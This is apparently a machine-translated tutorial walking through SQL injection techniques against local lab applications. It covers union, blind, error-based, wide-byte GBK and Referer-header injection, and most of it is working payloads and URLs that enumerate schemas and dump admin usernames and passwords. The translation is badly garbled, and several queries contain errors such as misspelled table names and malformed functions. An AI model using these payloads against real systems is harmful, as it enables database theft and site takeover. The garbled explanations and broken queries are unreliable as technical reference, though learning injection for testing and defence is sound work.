First, what is SQL injection:
The so-called SQL injection, is inserted through the SQL command into the Web form is submitted the query string or enter a domain name or page request, and ultimately to deceive the server to execute malicious SQL commands.
SQL injection What is the harm?
Hazard: data leakage, off the library, tampering with the site, destroying database, backdoor, getshell (site acquisition rights)
Why SQL injection vulnerabilities?
The rear end of the execution of the code data input by the user can be executed as code, contrary to the principle: the phase separation of code and data (Essence)
Preceding data transfer can be arbitrarily controlled, the controllable parameters; backend data transfer from the front stage filter without filtration or loose, resulting in (injected reasons) the SQL injection
First of all, I just now learned forty-five kinds of SQL injection method, see only learn, forgive me if wrong =. =
SQL injection I think if I could find the injection point is simple, big deal to interview myself up in various ways, while significant time costs.
So as long as the SQL vulnerability is likely to occur where there interact with the database to find the injection point in these places is very important friends.
SQL injection common database functions and constants
Common database functions and constants
@@ tmpdir temporary directory
@@datadir
Location @@ basedir database resides
@@ version version
@@ hostname the name of the current database
user()
version () version
database () Gets the database
concat()
group_concat()
concat_wa()
substr (): oracle, mysql, mssq l / substring (): mysql, mssql / mid (): mysql string interception
Note: The three parameters are, the first character is being taken, the second is the starting index, the third length is taken
left (pa1 (taken string), pa2 (taken length)) taken from the left string
right (pa1 (taken string), pa2 (taken length)) taken from the right string
sleep () allow dormant database
ord () displays the character ascll
if (condition value return condition is true or the statement, when the condition is false value or return statement)
if(1=1,true,false)
When the case when the conditions then the conditions for a return value or statements elas condition is true or false statement when the end
SELECT 1,CASE WHEN 1=1 THEN "hallo" ELAS "goodbye" END,3;
length () calculating the length of the string
Joint inquiry:
SELECT * FROM USERS WHERE id=1 UNION SELECT "a","b","c";
select * from users where user_id=0,1 union select 1,2,union select 1,2,user(),4,5,database(),7;
mysql database: a database field is a Schedule III
mysql>5,0
information_schema mysql> after 5.0 comes with the system libraries, summary (library name other databases, table names, field names)
columns in the table to store data (database names, table names, field names), need to focus on three fields at the table
Table_schema library name field stores other databases
Table_name table name field stores other databases
Field name column_name field stores other databases
select table_schema, table_name, column_name from information_schema.columns; // query table_schema (library name), table_name (table name), column_name (field names) corresponding to the data.
select table_schema, table_name, column_name from information_schema.columns where table_schema = "dvwa"; to query the database a summary of all tables and fields at the dvwa library (hex can perform dvwa)
A hand injection (meal is ah knock knock) {divided into seven steps, I believe that the five steps suffice}
1, detection of the injection point (where possible SQL injection), find similar ID (id / uid / typeid / sid / key ~~) argument (Google Hacking :), behind the need to enter some detection of malicious code:
'
'and 1=1#
'and 1=2--
-1' or '1'='1
~~~~~~~
Or you need single quotes are determined by stitching back-end SQL statements, such as:
id = '$ id' distal Test: id = 1 'and 1 = 1% 23
id = $ id distal Test: id = 1 and 1 = 1% 23
Enter the malicious payload is successfully performed (display page and error information), indicating where there is SQL injection point
But also to determine the next injection method: mainly based echo effect of the page to decide which technology to use injection
Determine the number of columns selected from a back-end database, and in which several columns in the front-end display?
http://localhost/jdy1.5/typeid.php?typeid=1 order by 5%23
Replace numbers, according to the page shows the number of columns is determined background database selected results, 5
union select 1,2,3,4,5%23
http://localhost/jdy1.5/typeid.php?typeid=1000000000000 union select 1,2,3,4,5%23
The display page displayed to be seen in the pre-stage position 2 can be replaced with the SQL statement 2
2, back-end database to collect information
View the current user: http: //localhost/jdy1.5/typeid.php typeid = 1000000000000 union select 1, user (), 3,4,5% 23?
View current database: http: //localhost/jdy1.5/typeid.php typeid = 1000000000000 union select 1, databases (), 3,4,5% 23?
http://localhost/jdy1.5/typeid.php?typeid=1000000000000 union select 1,(select group_concat(distinct table_schema) from information_schema.columns),3,4,5%23 查看所有的库
grout_concat splicing packet and distinct deduplication
3. Get the current name of the database table
http://localhost/jdy1.5/typeid.php?typeid=1000000000000 union select 1,(select group_concat(distinct table_name) from information_schema.columns where table_schema=jdycms),3,4,5%23 // jdycms需要转16进制
4, to obtain the specified table field names under current database
http://localhost/jdy1.5/typeid.php?typeid=1000000000000 union select 1,(select group_concat(distinct column_name) from information_schema.columns where table_schema=database() and table_name=jdy_admin ),3,4,5%23
jdy_admin need to turn hex
5, field data acquisition
http://localhost/jdy1.5/typeid.php?typeid=1000000000000 union select 1,(select group_concat(username,0x7e,password) from jdy_admin limit 0,1 ),3,4,5%23
limit 0,1 0 line starting from the first line is 0x7e ~
group_concat All concat display the selected row
6, decryption: cmd5 pmd5 so many ways decryption
7, looking for background login: guess, directory scanning, information collection
Second, time is divided into :( blinds blinds blinds and Boolean)
Blinds: after the data submitted by the user in the background database returns no data, the test data, at this time need to use blind techniques can not be displayed in the front,
Based on Boolean blinds
Time-based blind
Blind Bull Note:
1, the probe input point '/ 1' and 1 = 1% 23/1 'and' 1 '=' 1% 23
Note: the transfer of user data is brought back to the database for execution, according to the page display is determined whether there is here the injection point
2, collect database information (current user name, current database, version)
http://localhost/sqli-labs-master/Less-8/index.php?id=10' and length(user())=14%23
Is the length of the user 14 (bp sequence used to blast)
3、
http://localhost/sqli-labs-master/Less-8/index.php?id=10' and ascii(substr(user(),1,1))=114%23
(Asc used to code the characters sequentially determines) the user is the first letter of the horse asc 114 sequentially to subsequent r is determined root @ localhost
ascii(substr((select distinct table_name from information_schema.columns where table_schema=database() limit 0,1),1,1))=114
First calculate the length of a table name, and then judge each character
Eventually find valuable table: users
4. Get Field executive table
select distinct column_name from information_schema.columns where table name=0x7573657273 and table_schema=database() limit 0,1
The first field is the letter i, is determined to follow a first order field names, field names ~~~~ second
Finally, find out sensitive fields: username password
5, after the specified field data to
select group_concat(username,0x7e,password) from users limit 0,1
6, decrypt the ciphertext data, sign in background
Time-based literacy Note:
The concept of time: use a particular function allows the database to perform at a certain time to wait for the page to view the current page in the injection case
Function: sleep ()
select * from dvwa.users where user_id=1 and if(database(user())=14,sleep(5),'true');
The final no return value, need to focus on the response time of the browser
Benchmark (parameter 1, parameter 2), the number of times that the implementation of an eroded, parameter 2 is an operation using the function or expression. select benchmark (1000000,1000 * 1000);
1, find the injection point
2, access to database information
Length of the current database:
select * from dvwa.users where user_id=1 and if(database(database())=14,sleep(5),'true');
Get each character
select * from dvwa.users where user_id=1 and if(ascii(substring(database(),1,1))=114,sleep(5),'true');
3. Get the current database table
select * from dvwa.users where user_id=1 and if(ord(mid((select distinct table_name from infomation_schema.tables where table_schema=database() limit 0,1),1,1))=102,sleep(5),'true');
Find value tables, user
4, gets the specified fields in the table
select * from dvwa.users where user_id=1 and if(ord(mid((select distinct table_name from infomation_schema.tables where table_schema=database() and table_name=0x7573657273 limit 0,1),1,1))=102,sleep(5),'true');
Find interesting field, username password
5, access to content
select * from dvwa.users where user_id=1 and if(ord(mid((select concat(admin,0x7e,password)from dvwa.users limit 0,1)1,1))=102,sleep(5),'true');
Three, i.e., is given significant injection :( judged based on the error back)
Based on the injection being given
Error means: the use of some of the error function configuration payload, after being given the implementation of the database, and with the data we need out such an attack
Error function:
(1) extractvalue (parameter 1, parameter 2) returned from the query to the target XML string parameter 1 is the name of an XML document format string, the string parameter 2 is XPATH format (need to check)
select extractvalue(1,concat(0x7e,(select user()),0x7e));
(2) The updatexml (parameter 1, parameter 2, parameter 3) changing the value of the XML document qualified nodes, the parameter is an xml document, Xpath parameter string format is 2, 3 is replaced lookup parameter string format matches The data
select updatexml(1,concat(0x7e,(select user()),0x7e),1);
Note: first two being given limited length multiplex 32
(3) floor () function, must conut () counts rand () generates a random decimal between 0 and 1, if the given parameter (seed), it adds a fixed value goup by other functions in accordance with the use of the seed (function to achieve the same purpose may be substituted to use!)
select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from infomation_schema.tables group by x)a
a (select count (*) all records to be a statistical, concat (user (), floor (rand (0) * 2)) splice two parameters are ordered according to the overall X as x from infomation_schema.tables group by x)
The nature of the data burst to the floor by means of a given group by the given statement. The reason given group by statement is floor (random (0) * 2) uncertainty, which may be 0 or 1 may be (group by key principle is that each row cycle to read data, the result is saved in a temporary table . when the key is read for each row, if the key is present in the temporary table, the table is not in the temporary data in the temporary table is updated; if the key does not exist in the temporary table, the key is inserted in the temporary table row data .group by floor (random (0) * 2) is a key reason for the error is a random number, calculation and detects whether there is a temporary key table floor (random (0) * 2) may be 0, if at this time only a temporary table 1 row key is absent key row 0, then this record database to insert the temporary table, because it is a random number, but also to calculate the random value is inserted, this time floor (random (0) * 2) results 1 may be, will lead to conflicts when inserting error words and two calculated detection value of the random number is inserted.
Fourth, the wide-byte main injection injected :( escape special characters in accordance)
mysql_query ( "SET NAMES 'gbk'"); // set the character set encoding
mysql_set_charset ( "GBK"); // set the character set encoding
mysql_real_escape_string()
Escape filter parameters, the function having a similar function are: addslacher (), mysql_escape_string () [] after php5.3 abolished, magic quotes (The magic_quotes_gpc module), for a particular symbol ' "\ null <> and the like,
GBK encoding, an encoding mode for the characters, a character encoded using two bytes
1% df '= 1% df \' = 1% df% 25% 27 = 1 (% df% 25)% 27 = 1 op '
SELECT * FROM news WHERE tid='{$id}'
SELECT * FROM news WHERE tid = '{1 op'} '-> being given
Vulnerability forming principle: the results of a database after execution gbk encoding, performing data filtering function you submitted by the user will be filtered bytes = broad
Test Procedure
1, visit the site http:? // localhost / gbksql / 01 / id = 1 'to see the return results
2, http:? // localhost / gbksql / 01 / id = 1% df '(why use df able to use high after 81, 81 ~ fe?) 1% df' ----> 1% df \ '---> 1% df5c ---> 1 \ Yun'
3、 http://localhost/gbksql/01/?id=-1%81' union select 1,user(),3%23
PDO byte wide prevent SQL injection:
PDO: connect to the database - "Set Template -" Data Binding - "execute SQL statements
$ Conn-> setAttribute (PDO :: ATTR_EMULATE_PREPARES, false) to prevent most of the SQL injection
https://www.jianshu.com/p/c0deb8061718
Five, two-pass encoding Injection:
After decoding default browser will be a URL-encoded data from the form, reaching the server
PHP, URL decoding functions are: urldecode () rawurldecode ()
Six, HTTP header injection :( SQL injection method is based on a HTTP response packet)
Step 1: The name of the database security
Referer: ' or updatexml(1,concat('#',(database())),0),'')#
Step 2: table users
Referer: ' or updatexml(1,concat('#',(select group_concat(table_name) from information_schema.tables where table_schema='security')),0),'')#
Step 3: Field name id, username, password
Referer: ' or updatexml(1,concat('#',(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),0),'')#
Step 4: Data
Referer: ' or updatexml(1,concat('#',(select * from (select concat_ws('#',id,username,password) from users limit 0,1) a)),0),'')#